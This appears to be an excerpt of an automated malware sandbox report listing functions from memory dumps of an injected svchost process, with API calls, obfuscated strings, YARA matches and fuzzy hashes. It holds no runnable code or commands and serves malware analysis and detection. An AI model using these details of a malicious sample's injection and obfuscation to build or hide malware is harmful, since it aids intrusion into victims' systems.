                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                • Opcode ID: 2bd2167a4e7f6dab2e1cd489d9440a0ca284616ddd7043147b59e65cdf0518b5
                                                                                                                                • Instruction ID: 087371432958f2a416085335769c03a35b5ae5b1cdc14524cb8d8dc97a7afba0
                                                                                                                                • Opcode Fuzzy Hash: 2bd2167a4e7f6dab2e1cd489d9440a0ca284616ddd7043147b59e65cdf0518b5
                                                                                                                                • Instruction Fuzzy Hash: CF3110B6A0060AEFDB00DFD8D880DEEB7B9FF88304B108569E515E7214D775EE458BA0
                                                                                                                                Function 007CF2D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                • Opcode ID: a71b0924cbbfc49dcd7945062cefc867c74c85f10d8e4324556891bfcc765da8
                                                                                                                                • Instruction ID: c0cc89f5d641dbb9e010682703b4b4f1f05407bd5ab2eba83f0f224b58322ab0
                                                                                                                                • Opcode Fuzzy Hash: a71b0924cbbfc49dcd7945062cefc867c74c85f10d8e4324556891bfcc765da8
                                                                                                                                • Instruction Fuzzy Hash: 7631E0B6A0060AEFDB10DFD8D880DEEB7B9BF88304B108559E515A7214D775EE458BA0
                                                                                                                                Function 007C42C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007C4332
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: f4492ed622b56aa1196f4befe6511e7e75e319fef14f2bce32a757fa58cfd677
                                                                                                                                • Instruction ID: e12e40ea82ebd044954aa393b34c5ae9ca1e3167928d24bfa64794752ca0d504
                                                                                                                                • Opcode Fuzzy Hash: f4492ed622b56aa1196f4befe6511e7e75e319fef14f2bce32a757fa58cfd677
                                                                                                                                • Instruction Fuzzy Hash: 37011EB5D0020DFBDB10DAE4DC46FDDB7B8AB54308F008199E908A7241F635EB19CB91
                                                                                                                                Function 007D9520 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,007C80DE,00000010,?,?,?,00000044,?,00000010,007C80DE,?,?,?), ref: 007D9583
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                • Opcode ID: 2af5d56a34bb79a820e93f6fe9a2ef0717b65fa1a4a022f78d781b57001600df
                                                                                                                                • Instruction ID: 6338abc09db72f5510482e4edbbde219edad4893b0f1b8b108085caf55c0201e
                                                                                                                                • Opcode Fuzzy Hash: 2af5d56a34bb79a820e93f6fe9a2ef0717b65fa1a4a022f78d781b57001600df
                                                                                                                                • Instruction Fuzzy Hash: D101D2B2204208BFCB44DE99DC81EEB77ADEF8C754F408209BA0DE3240D630F8518BA4
                                                                                                                                Function 007B9B60 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007B9BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: 9605acba84d6d3f71114a3882c90ff74b62de6e913a7ea0c7675300b9b9c188d
                                                                                                                                • Instruction ID: 7d5c99be10fbfabea1d77db0a6ea2eba7d2e2f4a2b461d1c7e1ae5a44be709a6
                                                                                                                                • Opcode Fuzzy Hash: 9605acba84d6d3f71114a3882c90ff74b62de6e913a7ea0c7675300b9b9c188d
                                                                                                                                • Instruction Fuzzy Hash: 7EF0657338021476D62061A99C06FDB735CCB80BA1F540426FB0CEA2C0D895B50142A4
                                                                                                                                Function 007B9B5D Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007B9BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: 83b2addebb673329eb4ec8b57cebf2f1a6fd381d8491bad77c2873c3d7f68db8
                                                                                                                                • Instruction ID: a2f61488c1b29945144e4634de2615514868db294e2b5c4eca6483194d16b356
                                                                                                                                • Opcode Fuzzy Hash: 83b2addebb673329eb4ec8b57cebf2f1a6fd381d8491bad77c2873c3d7f68db8
                                                                                                                                • Instruction Fuzzy Hash: CBF0927378035077D63062A98C57FEB775C8F81B91F540065FB0CAB2C1D8A9B90182A8
                                                                                                                                Function 007D9460 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(007C1799,?,007D59C7,007C1799,007D548F,007D59C7,?,007C1799,007D548F,00001000,?,?,00000000), ref: 007D9499
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: 7fa87606b4b4779bf62fdda62ff41cb591a8ff84e810adbb296462deacfd7513
                                                                                                                                • Instruction ID: 811822f5bc53c6254233728010ac83b01a4828318487bc7d4aafc1a845573b4a
                                                                                                                                • Opcode Fuzzy Hash: 7fa87606b4b4779bf62fdda62ff41cb591a8ff84e810adbb296462deacfd7513
                                                                                                                                • Instruction Fuzzy Hash: 7AE06572200208BFDA10EE59DC45EAB37ADEFC9710F008009FA08A7281C635B8108BB8
                                                                                                                                Function 007D94A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,205D4511,00000007,00000000,00000004,00000000,007C3B31,000000F4), ref: 007D94D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: d18bb24bc6d8e356c38d33564657dd5783140c92d5f5953abc714d348d1e6449
                                                                                                                                • Instruction ID: 7a559731f7049f1c37ae3c8105faa141dd579248c8742681ba571b15d2faaeb5
                                                                                                                                • Opcode Fuzzy Hash: d18bb24bc6d8e356c38d33564657dd5783140c92d5f5953abc714d348d1e6449
                                                                                                                                • Instruction Fuzzy Hash: EBE09A72200308BFCA10EE48DC45FAB37ACEFC9760F008009F908A7241CA71B821CBB8
                                                                                                                                Function 007C7F07 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,007C1A90,007D7DCF,007D548F,007C1A60), ref: 007C7F43
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: fb3e7091cc3c8a84546f3075ec903e666442ad2ef1249a0916764e905b5ffc04
                                                                                                                                • Instruction ID: 415e0767aa3ab8dfd8333f5156f3c1f62f9aa4b787047d2035bec43bf5535e2f
                                                                                                                                • Opcode Fuzzy Hash: fb3e7091cc3c8a84546f3075ec903e666442ad2ef1249a0916764e905b5ffc04
                                                                                                                                • Instruction Fuzzy Hash: F4E0CD72784201BFEB80ABB0CC17FBA339C9F40744F50806CB90CEB6C2D964D0028A55
                                                                                                                                Function 007C7F10 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,007C1A90,007D7DCF,007D548F,007C1A60), ref: 007C7F43
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: a3ed98b999da36234d87361c41746dbe7f2141c11c4731236804a37c56f16122
                                                                                                                                • Instruction ID: 6eafe5a1b1aa318d4820e808724c92e14589a95c3d88c644d77ad846d74f1ae4
                                                                                                                                • Opcode Fuzzy Hash: a3ed98b999da36234d87361c41746dbe7f2141c11c4731236804a37c56f16122
                                                                                                                                • Instruction Fuzzy Hash: 24D05B712442057BF640B7F5CC17F96338C8740794F454068B90CD72C1DD58F5014565
                                                                                                                                Function 007C813D Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE ref: 007C814C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: fdae71e1ac9850fa1b5900f94ecbfdd942eb0badd0927116ac2c48b6038bf319
                                                                                                                                • Instruction ID: a9bb329010efe83f094b44e1a794b7a14ecfd187c88040b67dbb49aeff803c5d
                                                                                                                                • Opcode Fuzzy Hash: fdae71e1ac9850fa1b5900f94ecbfdd942eb0badd0927116ac2c48b6038bf319
                                                                                                                                • Instruction Fuzzy Hash: A2C0123515480806EA6455FC784876337899786338F280F1CA43C965D0D5379C5B5111
                                                                                                                                Function 03572C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                                                                                                                • Instruction ID: ae4038d81268c54db95a8d7c1132b0d3271e2478b71f2ebc004e3458dcd49d74
                                                                                                                                • Opcode Fuzzy Hash: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                                                                                                                • Instruction Fuzzy Hash: AFB09B719015C5D5DA11F76066087177949B7D0711F5DC461D3030647E4739C1D1E175

                                                                                                                                Non-executed Functions

                                                                                                                                Function 0340DF41 Relevance: 56.5, Strings: 45, Instructions: 225COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                • Opcode ID: b518e4ee65f041771028d460ff0fb6d857d30f0686553124833bf6cbfe1099ff
                                                                                                                                • Instruction ID: 12a3868ade33c8afc94746885426e65a338f35aee5e4e6100627eb55f19cb968
                                                                                                                                • Opcode Fuzzy Hash: b518e4ee65f041771028d460ff0fb6d857d30f0686553124833bf6cbfe1099ff
                                                                                                                                • Instruction Fuzzy Hash: C39150F04082948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8959CB85
                                                                                                                                Function 03403C9E Relevance: 20.1, Strings: 16, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !!,b$#9by$$#)"$/!(v$=,9$$?$)($N$\Y\M$c}vm$e." $m|c|$yc}m$yx}{$zvmc$~cxc$~c}c
                                                                                                                                • API String ID: 0-2692653123
                                                                                                                                • Opcode ID: 45835b4ce2a4f78c7c1027a1096df281fa444ad5498b70e21d73599969c4c3d3
                                                                                                                                • Instruction ID: fe2215a12988235b39bbaaa72216b32c48e16d5bd5df8ea2551832b0bcb847d8
                                                                                                                                • Opcode Fuzzy Hash: 45835b4ce2a4f78c7c1027a1096df281fa444ad5498b70e21d73599969c4c3d3
                                                                                                                                • Instruction Fuzzy Hash: 104164B0A1864CDACF24DF85D5857DDBBB2FF04344F80411AE8197F254C7B68666CB8A
                                                                                                                                Function 03572890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                                                                                                                • Instruction ID: 512c748b916199f3e699dd92a45fd2eaa41628d98beaeeed50ba4035a54a9085
                                                                                                                                • Opcode Fuzzy Hash: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                                                                                                                • Instruction Fuzzy Hash: E451E9B5A04616BFCF10DB9CF89097EF7B8BB48200B588969E4A5D7651D334DE40CBA0
                                                                                                                                Function 035E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: efe8494bed722fac76b7e3ffe103675514f5a9b56a9eee95acf3fa157aba05c9
                                                                                                                                • Instruction ID: 975f04bb8b9f63b2b0f63132807d247594d27badb3e632bcbcfca5972dd0b3f2
                                                                                                                                • Opcode Fuzzy Hash: efe8494bed722fac76b7e3ffe103675514f5a9b56a9eee95acf3fa157aba05c9
                                                                                                                                • Instruction Fuzzy Hash: ED512AB5A006456ECB38EF5CE99087FB7FDFB44200F048C5AE4A6DB695E774EA008760
                                                                                                                                Function 03567630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035A4655
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 035A4787
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035A4742
                                                                                                                                • Execute=1, xrefs: 035A4713
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035A46FC
                                                                                                                                • ExecuteOptions, xrefs: 035A46A0
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035A4725
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                                                                                                                • Instruction ID: b194caa1306dc0a56fbc8f4ce96d9a340e1ff2e38a31058a228338e9bb0a2d7b
                                                                                                                                • Opcode Fuzzy Hash: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                                                                                                                • Instruction Fuzzy Hash: 3D510B756007197AEF20EAA9FC45FAE77B8FF48308F0404E9D505AB2B1D7709A458F90
                                                                                                                                Function 03403BB9 Relevance: 11.3, Strings: 9, Instructions: 98COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ("/:$)4'>$+bn,$<$N$\Y\M$ache$bn*+$no-c
                                                                                                                                • API String ID: 0-2093109865
                                                                                                                                • Opcode ID: 3fb05e69fa03d232aaf4cc268001efecc0ee081d8b3de805b313321174a64664
                                                                                                                                • Instruction ID: 3ec5881253d3cf3ba84d78b299ecb5760edb91cd5c75ec4f5b69779694031a17
                                                                                                                                • Opcode Fuzzy Hash: 3fb05e69fa03d232aaf4cc268001efecc0ee081d8b3de805b313321174a64664
                                                                                                                                • Instruction Fuzzy Hash: FA318A7081478C8FCB04EF91E8446DDFBB0FB44319F80455ED48AAF241DB399545CB86
                                                                                                                                Function 03606940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction ID: 955172805935b54498cf2369d194e2aab1021491f0b1e4da70576387b6497189
                                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction Fuzzy Hash: F602F2B5508342AFC309DF18C591A6BBBF5EFC8704F04892DF9999B2A4DB31E905CB52
                                                                                                                                Function 0357B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction ID: d135196b6777541c468e469ca19b6bf304c7443fc87467950b63b72111212860
                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction Fuzzy Hash: 8181A074E052499EDF24CE68F8917FEBBB6BF45350F1C465AD861AB3B0C73499408B90
                                                                                                                                Function 035E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: 3846b1d456591609cd9cd47d1acf611c792fb1949c9b97f604b313a571d2a6b7
                                                                                                                                • Instruction ID: f81736da5907aaf8a90791bd95ba864ff6adc7b21976c5d955a6857ecca6579a
                                                                                                                                • Opcode Fuzzy Hash: 3846b1d456591609cd9cd47d1acf611c792fb1949c9b97f604b313a571d2a6b7
                                                                                                                                • Instruction Fuzzy Hash: 6421977AE00259ABCB18EF79EC409EEB7FCFF44640F480515E905E7254E730DA018B91
                                                                                                                                Function 03403B52 Relevance: 8.8, Strings: 7, Instructions: 78COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578253368.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3400000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ("/:$)4'>$+bn,$<$N$\Y\M$bn*+
                                                                                                                                • API String ID: 0-3280869354
                                                                                                                                • Opcode ID: 29a9d5795890a3f69875482f8de69e19c90086437f3984da3d8e31f96fca459c
